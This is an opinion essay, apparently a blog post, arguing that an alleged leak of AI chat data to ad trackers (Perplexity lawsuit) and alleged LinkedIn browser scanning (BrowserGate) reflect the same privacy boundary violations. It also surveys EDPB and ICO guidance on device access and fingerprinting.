Two women in 1960s dress talk on a terrace while two men spy from the window next door.

Two Fronts, One War: The Quiet Normalization of Digital Intimacy Theft

Two recent controversies, one centered on an AI interface and the other on a professional networking platform, look different on the surface. One concerns what people say to a machine. The other concerns what a website may learn about the machine itself. But the deeper pattern is the same. In both cases, the user’s private environment appears to be treated not as a boundary to respect, but as a resource to mine until law, scrutiny, or public embarrassment makes the practice too costly.

The first dispute concerns Perplexity. A proposed class action filed in federal court in California alleges that Perplexity, together with Meta and Google, enabled the interception and exploitation of users’ conversational data through tracking technologies. The complaint further alleges that these flows occurred even though users were engaging with a service marketed as a conversational AI tool, and that the data involved could include intensely private material such as health, financial, political, sexual, and mental health concerns. These are allegations, not judicial findings, and that distinction matters. But if even part of the theory survives scrutiny, the case goes well beyond another routine privacy dispute. It strikes at the central social promise of conversational AI, namely that a user can turn to such a system for inquiry, reflection, or even confession without silently entering the advertising machinery of the web.

The second dispute concerns LinkedIn, but here the primary public source is not a news report. The accusations have been assembled by Fairlinked e.V. through its BrowserGate investigation. Fairlinked alleges that hidden code on LinkedIn searches users’ computers for installed software, transmits the results to LinkedIn and to third parties, and does so without meaningful disclosure in the privacy policy. BrowserGate also claims that the scanning can reveal politically or religiously relevant software, disability-related tools, job-search activity, and the use of products that compete with LinkedIn’s own commercial offerings. Fairlinked goes further and argues that LinkedIn can connect these findings to identified individuals and their employers because the platform already sits on a graph of real names, employers, job titles, and professional relationships. Again, these are accusations advanced by an advocacy group and not findings of a court. Yet even at the level of alleged conduct, the ethical problem is obvious enough. A site built around verified professional identity is accused of treating the user’s browser environment as an object of silent inspection.

The common issue is not simply tracking. That word has been softened by overuse. It sounds procedural, almost bureaucratic, as though the problem were a few extra analytics tags or a mildly intrusive dashboard. The real issue is boundary violation. Most users understand that websites can see what they type into visible forms. Many also understand, at least dimly, that pages record clicks, scrolling, and page views. But ordinary users do not reasonably expect that an AI service may leak the substance of machine conversations into advertising and analytics ecosystems. Nor do they expect that a social platform may inspect their browser environment to infer which tools they use, what conditions or vulnerabilities they may have, or whether they are quietly preparing to leave their job. Those are not minor extensions of normal web observation. They are incursions into the digital equivalent of a person’s desk drawer.

European privacy doctrine has been moving in this direction for some time. The European Data Protection Board’s 2024 guidelines on Article 5(3) of the ePrivacy Directive make clear that the relevant legal concept is not limited to personal data in the narrow sense. The protected object is the user’s private sphere as embodied in terminal equipment and the information stored there. The guidelines expressly discuss tracking methods beyond cookies, including pixel tracking, local processing, identifiers, and fingerprinting-related techniques. They also make clear that the legal issue is not avoided simply because a company accesses information that it did not originally store itself. Reading a value from a user’s device can still fall within the rule.

British regulators have taken a similarly skeptical line. The ICO has stated plainly that organizations do not have free rein to use fingerprinting as they please and that such techniques, like other forms of advertising technology, must be deployed lawfully and transparently. Its guidance on storage and access technologies likewise reflects a broader regulatory view that the old “it is not a cookie” excuse no longer carries much moral or legal force. What matters is the reality of access to the user’s device and the quality of disclosure, necessity, and control.

This is why the stock defenses in such cases sound increasingly hollow. One company may say the data flow was needed for analytics, growth, fraud reduction, or product optimization. Another may say the probing was about abuse prevention, scraper detection, or platform integrity. Some of those aims can be legitimate in the abstract. The difficulty is that the modern technology industry has developed a habit of treating internal usefulness as a solvent that dissolves every boundary. Once a practice is considered operationally valuable, the appetite expands. More signals become justified. More retention becomes prudent. More linkages become strategic. More secrecy becomes convenient. By the time the public discovers the practice, the company has usually spent months or years persuading itself that necessity excuses everything.

AI raises the stakes even further because users disclose to these systems things they would never say into an ordinary search engine. They ask about illness, despair, debt, family conflict, legal exposure, sexual anxiety, political fear, and professional uncertainty. An AI interface is sold as a tool, but often used as a confessional. If the surrounding business logic remains infected by the habits of ad tech, then conversational AI becomes not an escape from surveillance capitalism but its most intimate new ingestion layer. The damage is not merely technical. It reshapes the norms of thought itself. A culture that invites people to externalize reasoning into machines cannot at the same time shrug when those externalized thoughts are treated as commercial exhaust.

BrowserGate highlights a complementary danger. Platforms that already possess enormous identity graphs rarely become modest. They become curious. If a company already knows who you are, where you work, and whom you know, it often wants to know what is installed in your browser, what software your firm relies on, and whether you are using tools that challenge its own business model. That is how market power mutates into private intelligence gathering. It is described as security. It may even partly serve security. But in practice it can also become a system for mapping rivals, classifying users, and exploiting informational asymmetry at scale.

What should happen next is not mysterious. Conversational AI systems should be prohibited, by default, from transmitting prompts and responses to third-party advertising or analytics stacks unless a user has given specific, informed, opt-in consent for exactly that practice. Social platforms should face strict limits on browser-environment scanning and fingerprinting, with any claimed anti-abuse exception confined to narrow, auditable, and clearly disclosed circumstances. Regulators should treat covert access to the software environment of users’ devices as presumptively unlawful unless necessity and proportionality are demonstrated, not merely asserted. And courts should stop indulging the fiction that intrusive technical access becomes acceptable when hidden behind the language of optimization or trust and safety.

Different headlines, same disease. The technology changes. The appetite does not. What is at stake is not just privacy in the sentimental sense. It is whether digital systems must recognize any zone of human and device intimacy that is not automatically available for extraction. If the answer is no, then the future of computing will not be intelligent. It will simply be invasive at a higher resolution.


Comments

Leave a Reply

Your email address will not be published. Required fields are marked *